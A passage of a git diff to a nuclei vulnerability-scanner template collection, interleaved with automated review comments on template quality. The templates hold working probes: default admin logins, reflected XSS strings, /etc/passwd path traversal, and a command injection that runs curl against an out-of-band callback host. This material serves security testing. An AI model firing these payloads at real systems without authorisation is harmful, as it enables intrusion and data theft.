{{Hostname}} + Content-Type: application/json + + {"id": 7, "visualizer-chart-type": ""} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"success":"Chart updated"}' + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2019/cve-2019-17444.yaml b/nuclei-templates/CVE-2019/cve-2019-17444.yaml new file mode 100644 index 0000000000..d7bb5dd6b7 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-17444.yaml 
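Review bot: This request is a state-changing write: it POSTs to `/wp-json/visualizer/v1/update-chart` with `"id": 7`, and the success matcher `{"success":"Chart updated"}` only fires once chart 7 has actually been modified on the scanned site. The description and tags should say so, for example adding `intrusive` to `tags` and a description sentence stating that the scan overwrites the chart-type field of chart id 7, so operators can exclude it from non-intrusive runs. The `visualizer-chart-type` value shows as an empty string in this rendering, which suggests markup was stripped; confirm what the committed file writes to the target before merging.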
@@ -0,0 +1,43 @@ +id: CVE-2019-17444 + +info: + name: Jfrog Artifactory <6.17.0 - Default Admin Password + author: pdteam + severity: critical + description: | + Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. + reference: + - https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes + - https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory + - https://nvd.nist.gov/vuln/detail/CVE-2019-17444 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-17444 + cwe-id: CWE-521 + tags: cve,cve2019,jfrog,default-login + +requests: + - raw: + - | + POST /ui/api/v1/ui/auth/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + X-Requested-With: XMLHttpRequest + Origin: {{RootURL}} + + {"user":"admin","password":"password","type":"login"} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"name":"admin"' + - '"admin":true' + condition: and + + - type: status + status: + - 200 +# Enhanced by mp on 2022/05/16 diff --git a/nuclei-templates/CVE-2019/CVE-2019-18393.yaml b/nuclei-templates/CVE-2019/cve-2019-18393.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-18393.yaml rename to nuclei-templates/CVE-2019/cve-2019-18393.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-20210.yaml b/nuclei-templates/CVE-2019/cve-2019-20210.yaml new file mode 100644 index 0000000000..b3d521aaa9 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-20210.yaml 
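Review bot: Unlike the sibling templates in this commit (CVE-2019-12962, CVE-2019-16931), the matchers here check only body words and status, not the response `Content-Type`; a 200 HTML page that happens to embed `"name":"admin"` and `"admin":true` (an inlined JS state object, for instance) would be reported as a successful default login. A `part: header` word matcher on `application/json`, in the same shape as the one in CVE-2019-16931, would tighten it. The `# Enhanced by mp` trailer is also missing the blank line that separates it from the matcher list in every other template of this batch.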
@@ -0,0 +1,44 @@ +id: CVE-2019-20210 + +info: + name: WordPress CTHthemes - Cross-Site Scripting + author: edoardottt + severity: medium + description: | + WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query. + reference: + - https://wpscan.com/vulnerability/10013 + - https://wpvulndb.com/vulnerabilities/10018 + - https://cxsecurity.com/issue/WLB-2019120112 + - https://nvd.nist.gov/vuln/detail/CVE-2019-20210 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-20210 + cwe-id: CWE-79 + tags: wp-theme,wpscan,cve,cve2019,wordpress,citybook,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "/wp-content/themes/citybook" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2019/cve-2019-20224.yaml b/nuclei-templates/CVE-2019/cve-2019-20224.yaml deleted file mode 100644 index 6cde65fe36..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-20224.yaml +++ /dev/null 
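Review bot: The body matcher requires `/wp-content/themes/citybook`, but the description says TownHub and EasyBook are affected too; on a site running either of those themes the reflection would occur and the template would still report nothing. Either narrow `name` and description to CityBook, or extend the matcher with the other theme paths under a separate `condition: or` word matcher. `text/html` is unquoted in the header matcher while the other templates in this commit quote it; valid YAML, but inconsistent.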
@@ -1,53 +0,0 @@ -id: CVE-2019-20224 - -info: - name: Pandora FMS 7.0NG - Remote Command Injection - author: ritikchaddha - severity: high - description: | - Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. - reference: - - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ - - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9 - - https://nvd.nist.gov/vuln/detail/CVE-2019-20224 - - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view - remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2019-20224 - cwe-id: CWE-78 - tags: pandorafms,rce,cve,cve2019,authenticated,oast - -requests: - - raw: - - | - POST /pandora_console/index.php?login=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - nick=admin&pass=admin&login_button=Login - - - | - POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - name: http - words: - - "http" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/17 diff --git a/nuclei-templates/CVE-2019/cve-2019-20354.yaml b/nuclei-templates/CVE-2019/cve-2019-20354.yaml new file mode 100644 index 0000000000..b02d059684 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-20354.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2019-20354 + +info: + author: "pikpikcu" + name: "piSignage 2.6.4 Directory Traversal" + severity: High + + #Source:-https://github.com/colloqi/piSignage/issues/97 + +requests: + - raw: + - | + GET /api/settings/log?file=../../../../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + Content-Length: 277 + Connection: close + Referer: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: + - "root:[x*]:0:0:" diff --git a/nuclei-templates/CVE-2019/CVE-2019-2588.yaml b/nuclei-templates/CVE-2019/cve-2019-2588.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-2588.yaml rename to nuclei-templates/CVE-2019/cve-2019-2588.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-2616.yaml b/nuclei-templates/CVE-2019/cve-2019-2616.yaml new file mode 100644 index 0000000000..af5ede4e98 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-2616.yaml 
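Review bot: `severity: High` is capitalized while every other template in this commit uses lowercase values (`high`, `medium`, `critical`); nuclei validates severity against a fixed lowercase set, so this template may be rejected at load time. The raw GET carries `Content-Length: 277` with no body, a malformed request that a strict server may hold open waiting for 277 bytes; drop that header. The `#Source:` comment should become a `reference:` list entry, and the `info` block lacks `description`, `classification`, `cwe-id` and `tags`, all of which the other new templates provide.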
@@ -0,0 +1,31 @@ +id: CVE-2019-2616 + +info: + name: XXE in Oracle Business Intelligence and XML Publisher + author: pdteam + severity: high + description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 + - https://www.exploit-db.com/exploits/46729 + + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.20 + cve-id: CVE-2019-2616 + +requests: + - raw: + - | + POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Content-Type: text/xml; charset=UTF-8 + + + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-2729.yaml b/nuclei-templates/CVE-2019/cve-2019-2729.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-2729.yaml rename to nuclei-templates/CVE-2019/cve-2019-2729.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-3402.yaml b/nuclei-templates/CVE-2019/cve-2019-3402.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-3402.yaml rename to nuclei-templates/CVE-2019/cve-2019-3402.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-7192.yaml b/nuclei-templates/CVE-2019/cve-2019-7192.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-7192.yaml rename to nuclei-templates/CVE-2019/cve-2019-7192.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-7254.yaml b/nuclei-templates/CVE-2019/cve-2019-7254.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-7254.yaml rename to nuclei-templates/CVE-2019/cve-2019-7254.yaml 
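Review bot: `info` has no `tags` entry, so this template is skipped by tag-scoped runs (`cve`, `cve2019`, `xxe`) unlike the rest of the commit, and `cwe-id` is missing as well (CWE-611 is the XXE weakness). `cvss-score: 7.20` uses a trailing zero unlike the `6.1`/`9.8` style elsewhere, and the `description` just repeats the title; CVE-2019-8442 two hunks below shares the trailing-zero score, the missing `tags`/`cwe-id`, and the `\ No newline at end of file` ending. The request body between `Content-Type: text/xml; charset=UTF-8` and `matchers:` is blank in this rendering, yet the only matcher waits for an `interactsh_protocol` hit; confirm the committed file still contains the `{{interactsh-url}}` reference the matcher depends on.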
diff --git a/nuclei-templates/CVE-2019/CVE-2019-7275.yaml b/nuclei-templates/CVE-2019/cve-2019-7275.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-7275.yaml rename to nuclei-templates/CVE-2019/cve-2019-7275.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-7315.yaml b/nuclei-templates/CVE-2019/cve-2019-7315.yaml new file mode 100644 index 0000000000..cb43ae8ab9 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-7315.yaml @@ -0,0 +1,35 @@ +id: CVE-2019-7315 + +info: + name: Genie Access WIP3BVAF IP Camera - Local File Inclusion + author: 0x_Akoko + severity: high + description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to local file inclusion via the web interface, as demonstrated by reading /etc/shadow. + reference: + - https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/ + - https://vuldb.com/?id.136593 + - https://nvd.nist.gov/vuln/detail/CVE-2019-7315 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-7315 + cwe-id: CWE-22 + tags: cve,cve2019,camera,genie,lfi,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/08 diff --git a/nuclei-templates/CVE-2019/cve-2019-8442.yaml b/nuclei-templates/CVE-2019/cve-2019-8442.yaml new file mode 100644 index 0000000000..2a44940ef6 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-8442.yaml 
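Review bot: The `path` entry `{{BaseURL}}/../../../../../etc/passwd` depends on the dot segments reaching the server verbatim; if the HTTP client normalizes the path before sending, the request degrades to `/etc/passwd` and the template never matches. CVE-2020-12447, deleted in this same commit, avoided that by percent-encoding the segments (`%2e%2e%2f`), and nuclei also offers `unsafe: true` on raw requests; one of those approaches, or a comment naming the nuclei version that preserves the literal path, should be added so the detection is not silently dead.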
@@ -0,0 +1,29 @@ +id: CVE-2019-8442 +info: + name: JIRA Directory Traversal + author: Kishore Krishna (siLLyDaddy) + severity: high + description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check. + reference: https://jira.atlassian.com/browse/JRASERVER-69241 + + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-8442 + +requests: + - method: GET + path: + - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml" + - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'com.atlassian.jira' + part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-8446.yaml b/nuclei-templates/CVE-2019/cve-2019-8446.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-8446.yaml rename to nuclei-templates/CVE-2019/cve-2019-8446.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-8449.yaml b/nuclei-templates/CVE-2019/cve-2019-8449.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-8449.yaml rename to nuclei-templates/CVE-2019/cve-2019-8449.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-8937.yaml b/nuclei-templates/CVE-2019/cve-2019-8937.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-8937.yaml rename to nuclei-templates/CVE-2019/cve-2019-8937.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-10124.yaml b/nuclei-templates/CVE-2020/CVE-2020-10124.yaml deleted file mode 100644 index 065a434919..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-10124.yaml +++ /dev/null 
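Review bot: `reference:` is a bare scalar here while every other template in this commit uses a list of URLs; tools that iterate references expect the list form, so write it as `reference:` / `  - https://jira.atlassian.com/browse/JRASERVER-69241`. The `name` would also read better in the batch's `Product <version> - Vulnerability` form, e.g. `Jira <7.13.4 / <8.0.4 / <8.1.1 - Directory Traversal`, which matches what the description states. The `part: body` key sits after `words:` in the second matcher while the sibling templates put it first; harmless, but inconsistent.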
@@ -1,31 +0,0 @@ -id: CVE-2020-10124 -info: - name: SolarWindsOrion LFI - author: medbsq - severity: medium -#- https://www.cvebase.com/cve/2019/11043 - -requests: - - method: GET - path: - - "{{BaseURL}}/web.config.i18n.ashx?l=j&v=j" - - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=j&v=j" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - matchers-condition: and - matchers: - - type: word - words: - - "SolarWinds.Orion.Core.Common." - - "Connection String" - condition: or - part: body - - type: word - words: - - "text/plain" - - "SolarWindsOrionDatabaseUser" - condition: or - part: header - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-10220.yaml b/nuclei-templates/CVE-2020/CVE-2020-10220.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-10220.yaml rename to nuclei-templates/CVE-2020/CVE-2020-10220.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-1147.yaml b/nuclei-templates/CVE-2020/CVE-2020-1147.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-1147.yaml rename to nuclei-templates/CVE-2020/CVE-2020-1147.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-11546.yaml b/nuclei-templates/CVE-2020/CVE-2020-11546.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-11546.yaml rename to nuclei-templates/CVE-2020/CVE-2020-11546.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-11710.yaml b/nuclei-templates/CVE-2020/CVE-2020-11710.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-11710.yaml rename to nuclei-templates/CVE-2020/CVE-2020-11710.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-11978.yaml b/nuclei-templates/CVE-2020/CVE-2020-11978.yaml deleted file mode 100644 index 5c7f6e6c5b..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-11978.yaml +++ /dev/null 
@@ -1,57 +0,0 @@ -id: CVE-2020-11978 -info: - name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution - author: pdteam - severity: high - description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. - reference: - - https://github.com/pberba/CVE-2020-11978 - - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 - - https://twitter.com/wugeej/status/1400336603604668418 - - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2020-11978 - cwe-id: CWE-77 - metadata: - shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs" - verified: "true" - tags: cve,cve2020,apache,airflow,rce,kev -requests: - - raw: - - | - GET /api/experimental/test HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - | - GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - | - POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/json - - {"conf": {"message": "\"; touch test #"}} - - | - GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1 - Host: {{Hostname}} - Accept: */* - extractors: - - type: regex - name: exec_date - part: body - group: 1 - internal: true - regex: - - '"execution_date":"([0-9-A-Z:+]+)"' - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_4, 
"operator":"BashOperator")' - - 'contains(all_headers_4, "application/json")' - condition: and diff --git a/nuclei-templates/CVE-2020/CVE-2020-12271.yaml b/nuclei-templates/CVE-2020/CVE-2020-12271.yaml deleted file mode 100644 index 8056743a9a..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-12271.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: CVE-2020-12271 -info: - name: Sophos XG Firewall Pre-Auth SQL Injection - author: medbsq - severity: critical -#https://www.cvebase.com/cve/2020/12271 -requests: - - method: GET - path: - - "{{BaseURL}}/userportal/webpages/myaccount/login.jsp" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - matchers: - - type: word - words: - - "loginstylesheet" - part: body diff --git a/nuclei-templates/CVE-2020/CVE-2020-12447.yaml b/nuclei-templates/CVE-2020/CVE-2020-12447.yaml deleted file mode 100644 index 78077a5c24..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-12447.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2020-12447 -info: - name: Onkyo TX-NR585 Web Interface - Directory Traversal - author: 0x_Akoko - severity: high - description: A Local File Inclusion (LFI) issue on Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal - reference: - - https://blog.spookysec.net/onkyo-lfi - - https://www.cvedetails.com/cve/CVE-2020-12447 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-12447 - cwe-id: CWE-22 - tags: cve,cve2020,onkyo,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 
diff --git a/nuclei-templates/CVE-2020/CVE-2020-13121.yaml b/nuclei-templates/CVE-2020/CVE-2020-13121.yaml new file mode 100644 index 0000000000..38db107834 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-13121.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-13121 +info: + name: Submitty 20.04.01 - Open redirect + author: 0x_Akoko + severity: medium + description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt. + reference: + - https://github.com/Submitty/Submitty/issues/5265 + - https://www.cvedetails.com/cve/CVE-2020-13121 + tags: cve,cve2020,redirect,submitty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-13121 + cwe-id: CWE-601 +requests: + - method: GET + path: + - '{{BaseURL}}/authentication/login?old=http%3A%2F%2Flexample.com' + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/nuclei-templates/CVE-2020/CVE-2020-13405.yaml b/nuclei-templates/CVE-2020/CVE-2020-13405.yaml deleted file mode 100644 index 9aae1f9bf7..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-13405.yaml +++ /dev/null 
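Review bot: The request sends `old=http%3A%2F%2Flexample.com`, which decodes to `http://lexample.com`, but the Location regex only accepts `example.com` or a `<label>.example.com` subdomain, so a redirect to `lexample.com` would not match and the template cannot fire as written. Either the payload was meant to read `http%3A%2F%2Fexample.com` or the regex is missing the leading character; the two must agree. `tags` also appears before `classification` here, unlike the other templates in this batch.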
@@ -1,43 +0,0 @@ -id: CVE-2020-13405 -info: - name: MicroWeber - Unauthenticated User Database Disclosure - author: ritikchaddha,amit-jd - severity: high - description: | - The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML. - reference: - - https://rhinosecuritylabs.com/research/microweber-database-disclosure/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-13405 - - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-13405 - cwe-id: CWE-306 - metadata: - shodan-query: http.html:"microweber" - verified: "true" - tags: cve,cve2020,microweber,unauth,disclosure -requests: - - raw: - - | - POST /module/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}admin/view:modules/load_module:users - - module={{endpoint}} - payloads: - endpoint: - - "users/controller" - - "modules/users/controller" - - "/modules/users/controller" - matchers: - - type: dsl - dsl: - - 'contains(body,"username")' - - 'contains(body,"password")' - - 'contains(body,"password_reset_hash")' - - 'status_code==200' - - 'contains(all_headers,"text/html")' - condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-14181.yaml b/nuclei-templates/CVE-2020/CVE-2020-14181.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-14181.yaml rename to nuclei-templates/CVE-2020/CVE-2020-14181.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14408.yaml b/nuclei-templates/CVE-2020/CVE-2020-14408.yaml new file mode 100644 index 0000000000..36f102aa68 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-14408.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2020-14408 +info: + name: Agentejo Cockpit 0.10.2 - Reflected XSS + author: edoardottt + severity: medium + description: An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-14408 + cwe-id: CWE-79 + reference: + - https://github.com/agentejo/cockpit/issues/1310 + - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14408 + metadata: + verified: true + tags: cve,cve2022,cockpit,agentejo,xss,oss +requests: + - method: GET + path: + - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "redirectTo = '/92874';alert(document.domain)//280';" + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-15129.yaml b/nuclei-templates/CVE-2020/CVE-2020-15129.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15129.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15129.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-15500.yaml b/nuclei-templates/CVE-2020/CVE-2020-15500.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15500.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15500.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-15505.yaml b/nuclei-templates/CVE-2020/CVE-2020-15505.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15505.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15505.yaml 
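Review bot: `tags: cve,cve2022,cockpit,agentejo,xss,oss` carries the wrong year tag for a 2020 CVE; the file name, `id` and `cve-id` all say CVE-2020-14408, so it should be `cve2020` or the template is missed by year-scoped runs. The `classification` block also precedes `reference` here, reversed from the other templates in this commit, and the trailing blank line and `# Enhanced by mp` trailer the rest of the batch carries are absent; minor, but the batch is otherwise uniform.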
diff --git a/nuclei-templates/CVE-2020/cve-2020-15568.yaml b/nuclei-templates/CVE-2020/CVE-2020-15568.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15568.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15568.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-15920.yaml b/nuclei-templates/CVE-2020/CVE-2020-15920.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15920.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15920.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-16270.yaml b/nuclei-templates/CVE-2020/CVE-2020-16270.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-16270.yaml rename to nuclei-templates/CVE-2020/CVE-2020-16270.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-16846.yaml b/nuclei-templates/CVE-2020/CVE-2020-16846.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-16846.yaml rename to nuclei-templates/CVE-2020/CVE-2020-16846.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-16920.yaml b/nuclei-templates/CVE-2020/CVE-2020-16920.yaml new file mode 100644 index 0000000000..66a1295845 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-16920.yaml 
@@ -0,0 +1,59 @@ +id: cve-2019-16920 + +info: + name: Unauthenticated Multiple D-Link Routers RCE + author: dwisiswant0 + severity: critical + description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. + + # References: + # - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r + +requests: + - raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Connection: close + Referer: http://{{Hostname}}/ + Upgrade-Insecure-Requests: 1 + 